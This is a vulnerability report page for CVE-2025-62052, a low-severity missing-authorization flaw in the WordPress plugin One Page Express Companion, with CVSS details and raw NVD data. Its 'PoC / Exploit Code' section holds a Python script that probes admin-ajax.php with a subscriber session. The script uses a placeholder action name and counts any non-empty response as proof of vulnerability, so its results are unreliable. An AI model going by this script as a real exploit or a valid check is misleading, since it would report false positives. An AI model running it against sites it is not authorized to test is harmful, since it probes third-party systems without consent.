Security Vulnerability Report
中文
CVE-2025-62052 CVSS 4.3 MEDIUM

CVE-2025-62052

Published: 2025-10-22 15:16:05
Last Modified: 2026-04-27 18:16:25

Description

Missing Authorization vulnerability in Horea Radu One Page Express Companion one-page-express-companion.This issue affects One Page Express Companion: from n/a through <= 1.6.43.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

One Page Express Companion <= 1.6.43

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-62052 PoC - One Page Express Companion Authorization Bypass # Target: WordPress site with One Page Express Companion plugin <= 1.6.43 import requests import sys def check_vulnerability(target_url): """ Check if target is vulnerable to CVE-2025-62052 """ # WordPress target URL base_url = target_url.rstrip('/') # Common AJAX endpoint ajax_url = f"{base_url}/wp-admin/admin-ajax.php" # Try to access protected functionality without proper authorization # Note: This is a conceptual PoC - actual exploitation depends on specific vulnerable endpoints headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36', 'Content-Type': 'application/x-www-form-urlencoded', } # Low-privilege user session (subscriber role) cookies = { # Add WordPress authentication cookies here 'wordpress_test_cookie': 'WP+Cookie+check' } # Example: Try to access admin functionality # Replace 'action' parameter with actual vulnerable action name data = { 'action': 'one_page_express_companion_vulnerable_action', # Additional parameters depending on the vulnerable endpoint } try: response = requests.post(ajax_url, headers=headers, data=data, cookies=cookies, timeout=10) # Check for successful unauthorized access if response.status_code == 200: # Analyze response for signs of successful exploitation if 'admin' in response.text.lower() or response.text != '': print(f"[+] Potential vulnerability confirmed at {target_url}") print(f"[+] Response status: {response.status_code}") return True print(f"[-] Target may not be vulnerable") return False except requests.exceptions.RequestException as e: print(f"[!] Error connecting to target: {e}") return False if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2025-62052_poc.py <target_url>") print("Example: python cve-2025-62052_poc.py http://example.com") sys.exit(1) target = sys.argv[1] check_vulnerability(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62052", "sourceIdentifier": "[email protected]", "published": "2025-10-22T15:16:04.667", "lastModified": "2026-04-27T18:16:24.523", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Horea Radu One Page Express Companion one-page-express-companion.This issue affects One Page Express Companion: from n/a through <= 1.6.43."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/one-page-express-companion/vulnerability/wordpress-one-page-express-companion-plugin-1-6-43-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}